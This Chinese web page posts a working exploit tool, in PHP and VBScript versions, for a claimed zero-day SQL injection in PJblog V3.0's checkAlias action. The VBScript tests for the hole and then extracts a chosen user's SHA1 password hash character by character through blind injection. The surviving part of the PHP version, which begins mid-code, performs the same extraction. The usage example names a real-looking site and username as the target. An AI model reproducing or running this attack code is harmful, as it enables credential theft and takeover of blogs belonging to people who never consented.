首页
    当前位置:
    首页 > 其他 > PJblog V3.0 0day php+Vbs版漏洞利用工具

    PJblog V3.0 0day php+Vbs版漏洞利用工具

    其他 04-24 1638 0

    PHP版代码如下:
    [code]
    =\''.$tmp_PassWord.substr($var_hash,$j,1).'\') And "1"="1';
    $injecturl = rawurlencode($injecturl);
    $injecturl = $var_holeurl.$injecturl;
    if(!CheckHole($injecturl)){
    $tmp_PassWord = $tmp_PassWord.substr($var_hash,$j-1,1);
    break;
    }
    print "\rPassword(SHA1):".$tmp_PassWord.substr($var_hash,$j,1);
    }
    }
    print "\r\nDone!";

    function CheckHole($temp_url)
    {
    $var_pagelen=file_get_contents($temp_url);
    $var_newpagelen=strpos($var_pagelen, 'check_error');
    return $var_newpagelen;
    }
    ?>
    [/code]

    Vbs版漏洞利用工具代码如下:
    [code]
    If WScript.Arguments.Count <> 2 Then
    WScript.Echo "Usage: Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名"
    WScript.Echo "Example: Cscript.exe Exp.vbs http://www.pjhome.net puterjam"
    WScript.Quit
    End If

    attackUrl = WScript.Arguments(0)
    attackUser = WScript.Arguments(1)
    attackUrl = Replace(attackUrl,"\","/")
    If Right(attackUrl , 1) <> "/" Then
    attackUrl = attackUrl & "/"
    End If
    SHA1Charset = "0123456789ABCDEFJ"
    strHoleUrl = attackUrl & "action.asp?action=checkAlias&cname=0kee"""

    If IsSuccess(strHoleUrl & "or ""1""=""1") And Not IsSuccess(strHoleUrl & "and ""1""=""2") Then
    WScript.Echo "恭喜!存在漏洞"
    Else
    WScript.Echo "没有检测到漏洞"
    WScript.Quit
    End If

    For n=1 To 40
    For i=1 To 17
    strInject = strHoleUrl & " or 0<(Select Count(*) From blog_member Where mem_name='" & attackUser & "' And mem_password>='" & strResult & Mid(SHA1Charset, i, 1) & "') And ""1""=""1"
    If Not IsSuccess(strInject) Then
    strResult = strResult & Mid(SHA1Charset, i-1, 1)
    Exit For
    End If
    strPrint = chr(13) & "Password(SHA1): " & strResult & Mid(SHA1Charset, i, 1)
    WScript.StdOut.Write strPrint
    Next
    Next
    WScript.Echo Chr(13) & Chr (10) & "Done!"

    Function PostData(PostUrl)
    Dim Http
    Set Http = CreateObject("msxml2.serverXMLHTTP")
    With Http
    .Open "GET",PostUrl,False
    .Send ()
    PostData = .ResponseBody
    End With
    Set Http = Nothing
    PostData =bytes2BSTR(PostData)
    End Function

    Function bytes2BSTR(vIn)
    Dim strReturn
    Dim I, ThisCharCode, NextCharCode
    strReturn = ""
    For I = 1 To LenB(vIn)
    ThisCharCode = AscB(MidB(vIn, I, 1))
    If ThisCharCode < &H80 Then strReturn = strReturn & Chr(ThisCharCode) Else NextCharCode = AscB(MidB(vIn, I + 1, 1)) strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) I = I + 1 End If Next bytes2BSTR = strReturn End Function Function IsSuccess(PostUrl) strData = PostData(PostUrl) 'Wscript.Echo strData if InStr(strData,"check_error") >0 then
    IsSuccess = True
    Else
    IsSuccess = False
    End If
    'Wscript.Sleep 500 '让系统休息一下
    End Function
    [/code]

    用法:Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名

    标签:

    PJblog V3.0 0day php+Vbs版漏洞利用工具:等您坐沙发呢!

    发表评论

    表情
    还能输入210个字